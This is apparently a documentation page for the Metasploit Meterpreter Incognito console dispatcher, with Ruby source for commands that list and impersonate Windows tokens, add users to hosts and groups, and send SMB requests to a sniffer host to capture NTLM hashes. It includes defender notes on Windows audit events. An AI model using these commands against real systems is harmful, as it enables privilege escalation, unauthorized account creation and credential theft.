Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
- Inherits:
-
Object
- Object
- Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
- Defined in:
- lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
Overview
Privilege escalation extension user interface.
Constant Summary collapse
- Klass =
Console::CommandDispatcher::Incognito
- @@add_user_opts =
Rex::Parser::Arguments.new( "-h" => [ true, "Add user to remote host" ])
- @@add_localgroup_user_opts =
Rex::Parser::Arguments.new( "-h" => [ true, "Add user to local group on remote host" ])
- @@add_group_user_opts =
Rex::Parser::Arguments.new( "-h" => [ true, "Add user to global group on remote host" ])
- @@list_tokens_opts =
Rex::Parser::Arguments.new( "-u" => [ false, "List tokens by unique username" ], "-g" => [ false, "List tokens by unique groupname" ])
Instance Attribute Summary
Attributes included from Ui::Text::DispatcherShell::CommandDispatcher
Instance Method Summary collapse
- #cmd_add_group_user(*args) ⇒ Object
- #cmd_add_localgroup_user(*args) ⇒ Object
- #cmd_add_user(*args) ⇒ Object
- #cmd_impersonate_token(*args) ⇒ Object
- #cmd_list_tokens(*args) ⇒ Object
- #cmd_snarf_hashes(*args) ⇒ Object
-
#commands ⇒ Object
List of supported commands.
-
#initialize(shell) ⇒ Incognito
constructor
Initializes an instance of the priv command interaction.
-
#name ⇒ Object
Name for this dispatcher.
- #system_privilege_check ⇒ Object
Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
check_hash, #client, #docs_dir, #filter_commands, #log_error, #msf_loaded?, #session, set_hash, #unknown_command
Methods included from Msf::Ui::Console::CommandDispatcher::Session
#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help
Methods included from Ui::Text::DispatcherShell::CommandDispatcher
#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt
Constructor Details
#initialize(shell) ⇒ Incognito
Initializes an instance of the priv command interaction.
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 23

#
# Builds the Incognito command dispatcher for a console shell.
#
# No state of its own is set up here; construction is handed straight to
# the parent implementation with the same argument.
#
# @param shell the console shell this dispatcher is attached to
#
def initialize(shell)
  super
end
Instance Method Details
#cmd_add_group_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 177

#
# Console handler for +add_group_user <groupname> <username> [options]+.
#
# Forwards the request to the incognito extension and echoes whatever text
# it returns. Per the usage text, the remote side tries every accessible
# token until one succeeds, a non-access-denied error occurs, or the tokens
# run out.
#
# Defender note: on a Windows host with account-management auditing enabled,
# a successful addition to a global group is normally recorded as Security
# event 4728.
#
# NOTE(review): the positionals are read from args[0] and args[1] exactly as
# passed, so an invocation that puts -h first would presumably have the
# option text taken as the group name. Confirm against
# Rex::Parser::Arguments#parse.
#
# @return [true, nil] true once the request was sent, nil when only the
#   usage text was printed
#
def cmd_add_group_user(*args)
  # The loopback address is the target unless -h names another host.
  host = "127.0.0.1"

  @@add_group_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  groupname, username = args

  response = client.incognito.incognito_add_group_user(host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
#cmd_add_localgroup_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 147

#
# Console handler for +add_localgroup_user <groupname> <username> [options]+.
#
# Forwards the request to the incognito extension and echoes whatever text
# it returns. Per the usage text, the remote side tries every accessible
# token until one succeeds, a non-access-denied error occurs, or the tokens
# run out.
#
# Defender note: on a Windows host with account-management auditing enabled,
# a successful addition to a local group is normally recorded as Security
# event 4732.
#
# NOTE(review): the positionals are read from args[0] and args[1] exactly as
# passed, so an invocation that puts -h first would presumably have the
# option text taken as the group name. Confirm against
# Rex::Parser::Arguments#parse.
#
# @return [true, nil] true once the request was sent, nil when only the
#   usage text was printed
#
def cmd_add_localgroup_user(*args)
  # The loopback address is the target unless -h names another host.
  host = "127.0.0.1"

  @@add_localgroup_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  groupname, username = args

  response = client.incognito.incognito_add_localgroup_user(host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
#cmd_add_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 117

#
# Console handler for +add_user <username> <password> [options]+.
#
# Forwards the request to the incognito extension and echoes whatever text
# it returns. Per the usage text, the remote side tries every accessible
# token until one succeeds, a non-access-denied error occurs, or the tokens
# run out.
#
# Defender note: on a Windows host with account-management auditing enabled,
# a successful account creation is normally recorded as Security event 4720.
#
# NOTE(review): the password is a plain positional argument, so it may be
# kept in console history or session logs. Confirm how the console records
# commands.
#
# NOTE(review): the positionals are read from args[0] and args[1] exactly as
# passed, so an invocation that puts -h first would presumably have the
# option text taken as the username. Confirm against
# Rex::Parser::Arguments#parse.
#
# @return [true, nil] true once the request was sent, nil when only the
#   usage text was printed
#
def cmd_add_user(*args)
  # The loopback address is the target unless -h names another host.
  host = "127.0.0.1"

  @@add_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  username, password = args

  response = client.incognito.incognito_add_user(host, username, password)
  response.each_line { |line| print(line) }

  true
end
#cmd_impersonate_token(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 99

#
# Console handler for +impersonate_token <token>+.
#
# Passes the first argument to the incognito extension and echoes the text
# it returns. Per the usage text, later actions in the session then run in
# the context of the selected token.
#
# @return [true, nil] true once the request was sent, nil when only the
#   usage text was printed
#
def cmd_impersonate_token(*args)
  if args.empty?
    print_line("Usage: impersonate_token <token>\n")
    print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
    print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
    print_line("Hint: Enclose with quotation marks if name contains a space\n")
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  username = args.first
  response = client.incognito.incognito_impersonate_token(username)
  response.each_line { |line| print(line) }

  true
end
#cmd_list_tokens(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 55

#
# Console handler for +list_tokens <list_order_option>+.
#
# One of -u (by unique username) or -g (by unique groupname) is required.
# The order code is sent to the incognito extension, and the 'delegation'
# and 'impersonation' entries of its reply are printed under their own
# headings.
#
# @return [true, nil] true once the listing was printed, nil when only the
#   usage text was printed
#
def cmd_list_tokens(*args)
  # -1 means "no ordering flag seen"; the last flag on the line wins.
  order_codes = { "-u" => 0, "-g" => 1 }
  token_order = -1

  @@list_tokens_opts.parse(args) do |opt, _idx, _val|
    token_order = order_codes[opt] if order_codes.key?(opt)
  end

  if token_order < 0
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(token_order)

  sections = [
    ["Delegation Tokens Available", 'delegation'],
    ["Impersonation Tokens Available", 'impersonation']
  ]

  sections.each do |heading, key|
    print_line()
    print_line(heading)
    print_line("========================================")
    tokens[key].each_line { |line| print(line) }
  end
  print_line()

  true
end
#cmd_snarf_hashes(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 207

#
# Console handler for +snarf_hashes <sniffer_host>+.
#
# Passes the first argument to the incognito extension. Per the usage text,
# the remote side makes SMB requests to that host with every accessible
# token. Nothing returned by the extension is printed here; the result is
# expected in the sniffer's own logs.
#
# Defender note: the behaviour described is outbound SMB authentication from
# the host to an arbitrary address. Egress filtering of SMB and monitoring
# for SMB sessions to unexpected destinations are the usual controls.
#
# @return [true, nil] true once the request was sent, nil when only the
#   usage text was printed
#
def cmd_snarf_hashes(*args)
  if args.empty?
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  # Advisory only: the check prints a warning and the command continues.
  system_privilege_check

  sniffer_host = args.first

  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(sniffer_host)
  print_line("[*] Done. Check sniffer logs")

  true
end
#commands ⇒ Object
List of supported commands.
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 30

#
# List of supported commands.
#
# @return [Hash{String => String}] command name mapped to its one-line help
#   text, in the order the commands are listed
#
def commands
  supported = {}
  supported['add_user']            = 'Attempt to add a user with all tokens'
  supported['add_localgroup_user'] = 'Attempt to add a user to a local group with all tokens'
  supported['add_group_user']      = 'Attempt to add a user to a global group with all tokens'
  supported['list_tokens']         = 'List tokens available under current user context'
  supported['impersonate_token']   = 'Impersonate specified token'
  supported['snarf_hashes']        = 'Snarf challenge/response hashes for every token'
  supported
end
#name ⇒ Object
Name for this dispatcher
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 233

#
# Name for this dispatcher.
#
# @return [String] the fixed label "Incognito"
#
def name
  'Incognito'
end
#system_privilege_check ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 223

#
# Prints a two-line warning when the session is not running as SYSTEM.
#
# The check is advisory. Nothing is raised, and the command handlers on
# this page call it without using its result, so they carry on either way.
#
def system_privilege_check
  return if client.sys.config.is_system?

  print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
  print_line(" Call rev2self if primary process token is SYSTEM")
end